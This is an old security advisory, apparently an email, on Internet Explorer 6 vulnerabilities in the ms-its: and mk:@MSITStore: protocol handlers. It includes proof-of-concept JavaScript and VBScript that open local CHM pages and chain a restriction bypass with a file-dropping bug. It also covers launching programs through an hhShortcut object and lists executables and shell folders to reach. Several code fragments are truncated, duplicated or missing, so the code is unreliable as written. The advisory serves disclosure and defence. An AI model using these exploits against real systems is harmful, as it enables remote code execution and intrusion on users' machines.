Subject: IE ms-its: and mk:@MSITStore: vulnerability
X-UIDL: (-8"!#K8"!pS_"!];f"!
X-Evolution-Source: pop://antoine@pop3.uklinux.net/
Content-Transfer-Encoding: 8bit
advisory#2
/--------------------------------------------------------------------/
Vendor: Microsoft Corp.
product: IE.6(only tested on winXP,other products might
be vulnerable too including IE.5)
Discovery by: Roozbeh Afrasiabi (roozbeh_afrasiabi@yahoo.com)
Discovery date : NOV,2001 Reported :MAR,2004
Title: IE ms-its: and mk:@MSITStore: vulnerability
MSRC: MSRC5162mr
/--------------------------------------------------------------------/
TABLE OF CONTENTS:
==================
Description..............................................1
Solutions................................................2
PoCs.....................................................3
References...............................................4
Contact info.............................................5
Disclaimer...............................................6
1)Description:
==================
There exists a security issue with the way the ms-its(its) and mk:@MSITStore:protocol handlers become available to internet explorer after *.chm files that are functional outside help and support center are initiated using showhelp() , when this happens internet explorer is capable of accessing thosefiles using ms-its(its) or mk:@MSITStore: protocol handlers , the nature of these files makes this matter dangerous to the users . The pages that becomeavailable to IE using ms-its or mk:@MSITStore: p-handlers are only those thatof the chm file opened using showhelp() however this can be bypassed using the restriction bypass vulnerability previously reported by Arman Nayyeri.
I must point out that the ms-its: and mk:@MSITStore: protocol handlers are also available to IE when no chm file has been opened but to access these filesthe path to the target chm file must be used which is why the restriction Bypass vulnerability is possible.
Combined with other vulnerabilities that can place files on user 's system it is possible to open harmful html pages in victim 's MYcomputer zone,the fact that these two p-handlers can use the path of their target files gives the author the idea that it is also possible to run chm files from a web server in victim's internet zone in the same way by using their internet address.
(ms-its:http:\\www.exploit.com\exploit.chm::\exploit.htm).
Execution of programs is also possible but this can only be true when a chm file that imports shared.js is already open,Shared.js which is part of ntshared.chm is actually the main script used in most windows chm files,this file has a lot of functionality which can be exploited to bypass restrictions.When IE opens these files using the two p-handlers discussed they are not as restricted as a simple html file would be.Execution of programs that are shiped with the os is done using their name but it is also possible to run exe files using their path,
access to some shell folders is also possible.you can automate the execution of a program using object tag too.When programs are executed using object tag on victim's system there is no need for knowing the exact path to the executables whose MUICACHE name is fixed when such program iscalled using an object the MUICACHE is searched to find an exe with the same MUICACHE name or exe name executables like this are initiated without the need of knowing their exact path.
The following represents some of these executables and shell folders:
I)exe/s
conf.exe
notepad.exe
ntbackup.exe
spider.exe
tourstart.exe
explorer.exe
iexplore.exe
RealPlay.exe
wmplayer.exe
xmplayer.exe
hh.exe
regedit.exe
sol.exe
taskmgr.exe
winmine.exe
WScript.exe
appwiz.cpl
access.cpl
hdwwiz.cpl
nusrmgr.cpl
II)folder/s
shell:windows
shell:cookies
shell:recent
shell:system
shell:Common AppData
shell:Common Desktop
shell:Common Documents
shell:Common Favorites
shell:Common Programs
shell:Common Start Menu
shell:Common Startup
shell:Common Templates
shell:Common Administrative Tools
shell:CommonVideo
shell:CommonPictures
shell:Personal
shell:local appdata
shell:profile
shell:Administrative Tools
The fact that IE can access chm files using these two protocol handlers is due to the fact that
this software in windows OS dose not act as a simple browser , IE is capable of interacting and
responding to different protocols some of which like "shell:" , "about:" , "res:" ,.... have
previously been reported vulnerable which makes the author consider the remaining protocols
vulnerable too.
*ntshared.js is also available via iexplore.chm.
*you might want to use (iexplore.chm::/iegetsrt.htm) to have full confidance it exists .
*ms-its:D:\x.chm::\run.htm if run.htm was crafted so that it executes x.exe when it is
called using ms-its help would search d:\ to find x.exe.
*MUICACHE : HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache
*for more info on shell folders take a look at my first advisory:
http://www.freewebs.com/roozbeh_afrasiabi/advisory(1).txt
2)Solutions:
==================
-Best solution
The best solution to this problem is limiting IE 's functionality to that of a simple browser which I doubt Microsoft is able of achieving in near future because most products and even the windows/OS developed by Microsoft cop. is based upon this extra functionality which makes the
situation even worse.
-Solution from author:
1)run regedit.exe
2)find the following key : HKEY_CLASSES_ROOT\PROTOCOLS\Handler
3)select any of the protocol handlers unnecessary
4)disable them by replacing "-" in front of their clsid value
*The author considers most of these protocol handlers vulnerable and it is best if users disablethose protocols they find unsafe.
[Caution]
If you have used Author's solution be aware that running chm files directly from your system after disabling it using regedit would in some cases cause instant restart.
-solution from Microsoft:
Microsoft was notified and they had one week to give me their solution but
they failed to do so. sorry mike could not wait longer.
3)Proof of concept:
===================
*download x.chm from http://www.freewebs.com/roozbeh_afrasiabi/x.chm
for testing this vulnerability.
x.chm content:
dis-info.htm
exe(0).htm:list of some programs and shell folders that can be executed
exe(1).htm:cmd
exe(2).htm:minesweeper
exe(3).htm:notepad
exe(4).htm:wordpad
exe(5).htm:cdm+dir
exe(6).htm:c:\\x.exe
exe(7).htm:Run your desired program as far as either it's path or MUICACHE name is known.
folder(1).htm:windows folder
folder(2).htm:profile folder
folder(3).htm:cookies folder
logoff.htm:on win/xp causes user logoff
vulnerable.htm
a)availability of the two p-handlers using exact path:
=========================
mk:@MSITStore:%windir%\Help\ntshared.chm::/copyright.htm
or mk:@MSITStore:%windir%\Help\ntshared.chm::copyright.htm
%windir% =location of the operating system directory
The following poc uses a vulnerability in wmplayer 8.0 to place
x.chm on victim's system.
<script language="javascript">
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i
function x(){
//hcp://services/subsite?node=_System_/Tools_Center&topic=ms-its:c:\\x.chm::\exploit.htm
//showHelp("ms-its:c:\\x.chm::exploit.htm")
//showHelp("ms-its:addremov.chm::..\\..\\c:\\ntshared.chm::\\copyright.htm");
window.open("ms-its:c:\\x.chm::\vulnerable.htm","mywindow","location=0,status=1,scrollbars=1")
mywindow.moveTo(0,0);
}
</script>
*If you want to test this locally change "http://www.freewebs.com/roozbeh_afrasiabi/x.chm"
to file:\\location of chm file.
*for more info about the script that places the file on victim's system visit malware.com
or www.K-OTiK.Com.
The following poc was given by Arman Nayyeri for the restriction bypass vulnerability,
by changing the showhelp function to window.open you can use it as a poc to my report too:
*rename c.chm to x.wsz
Wait For 8 Seconds...
<script>
setTimeout(
function () {
window.open("mk:@MSITStore:iexplore.chm::..\\..\\..\\..\\program
files\\winamp\\skins\\x.wsz::\winamp.htm");
//hcp://services/subsite?node=blank&topic=ms-its:c:\program files\winamp\skins\x.chm::\exe(7).htm
},
8000
);
</script>
*As seen in the above it is also possible to use hcp://services/subsite?
node=blank&topic=ms-its:c:\x.chm::\exe(7).htm if the victim system is vulnerable to hcp::// .
b)restriction bypass vulnerability
====================================
Exploit
<SCRIPT LANGUAGE=javascript>
function getlink(){
target=window.open("ms-its:addremov.chm::..\\..\\ntshared.chm::\\copyright.htm")
}
</script>
Restriction Bypass Vulnerability + ms-its: p-handler
vulnerability
<SCRIPT LANGUAGE=VBSCRIPT>
Private SUB exploit_OnClick()
ON ERROR RESUME NEXT
showHelp("addremov.chm::/win_addprog_window_component.htm")
getlink()
END SUB
</SCRIPT>
c)MS-its
==================
(situation: when showhelp() is used to make these p-handlers available)
Exploit
<SCRIPT LANGUAGE=javascript>
function getlink(){
target=window.open("ms-its:addremov.chm::/win_addprog_install_program.htm")
}
</script>
Internet Explorer MS-ITS protocol handler
vulnerability
<SCRIPT LANGUAGE=VBSCRIPT>
Private SUB exploit_OnClick()
ON ERROR RESUME NEXT
showHelp("addremov.chm::/win_addprog_window_component.htm")
getlink()
END SUB
</SCRIPT>
d)mk:@MSITStore
==================
(situation: when showhelp() is used to make these p-handlers available)
Exploit
<SCRIPT LANGUAGE=javascript>
function getlink(){
target=window.open("mk:@MSITStore:isconcepts.chm::/ismain-concepts_52.htm/")
}
</script>
Internet Explorer mk:@MSITStore: protocol handler
vulnerability
<SCRIPT LANGUAGE=VBSCRIPT>
Private SUB exploit_OnClick()
ON ERROR RESUME NEXT
showHelp("isconcepts.chm::/ismain-concepts_52.htm")
getlink()
END SUB
</SCRIPT>
e)Either of this p-handlers allow use of files the local chm file contains *.js,*.gif,*.htm
*.css,*.xml,
=================================
ms-its:ntshared.chm::\warning.gif
ms-its:ntshared.chm::\shared.js
ms-its:ntshared.chm::\glossary.xml
ms-its:ntshared.chm::\coua.css
This can be used to test if help is running on victim's system or not.
<SCRIPT LANGUAGE="JScript">
function x(){
showHelp("filefold.chm::/windows_fcab_playall.htm");
location.reload();
}
</script>
There is also the possibility of importing *.js files like shared.js:
<SCRIPT LANGUAGE="JScript" SRC="MS-ITS:ntshared.chm::/shared.js"></SCRIPT>
f)information disclosure
========================
<
Exploit
g)chm file on a web server
===========================
Exploit
*How about banner free webpages for those who are vulnerable!!!
h)HCP://
==================
This proves the fact that other programs that use internet explorer might be vulnerable too.
hcp://services/subsite?node=blank&topic=ms-its:isconcepts.chm::/ismain-concepts_62.htm
hcp://services/subsite?node=_System_/Tools_Center&topic=ms-its:c:\\x.chm::\vulnerable.htm
I)execution of programs
======================
Exploit
*"c:\\x.chm::exploitx.htm" can be replaced with http:\\www.exploit.com\x.chm::exploitx.htm
but to acheive this some changes must be made.
Links that execute programs have the following general look:
@@Shortcut text@@
callShortcut a function in shared.js changes links like this into an object :
<object id='hhShortcut' type='application/x-oleobject'
classid='clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11' STYLE='display:none'>
</object>
This object is then inserted before the end of the htm page using insertAdjacentHTML() function.
The following would do the trick:
var __w=document.write('<object id=hhShortcut type=application/x-oleobject
classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 STYLE=display:none\u003E
This can be used to test if help is running on victim's system or not.
<SCRIPT LANGUAGE="JScript">
function x(){
showHelp("filefold.chm::/windows_fcab_playall.htm");
location.reload();
}
</script>